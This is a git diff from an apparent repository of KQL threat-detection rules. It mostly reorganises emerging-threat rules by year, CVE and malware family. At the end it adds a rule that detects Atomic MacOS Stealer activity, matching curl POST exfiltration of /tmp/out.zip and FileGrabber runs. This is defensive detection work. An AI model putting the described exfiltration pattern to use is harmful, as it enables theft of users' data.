rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
rename to KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
rename to KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
rename to KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
rename to KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
rename to KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
rename to KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
rename to KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
rename to KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
rename to KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
rename to KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
rename to KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql
diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
new file mode 100644
index 00000000..6d5f7945
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - FileGrabber Activity
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "POST" and ProcessCommandLine contains "user:" and ProcessCommandLine contains "-H " and ProcessCommandLine contains "BuildID" and ProcessCommandLine contains "file=@/tmp/out.zip" and ProcessCommandLine contains "cl: 0") or (ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
new file mode 100644
index 00000000..51ba564e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
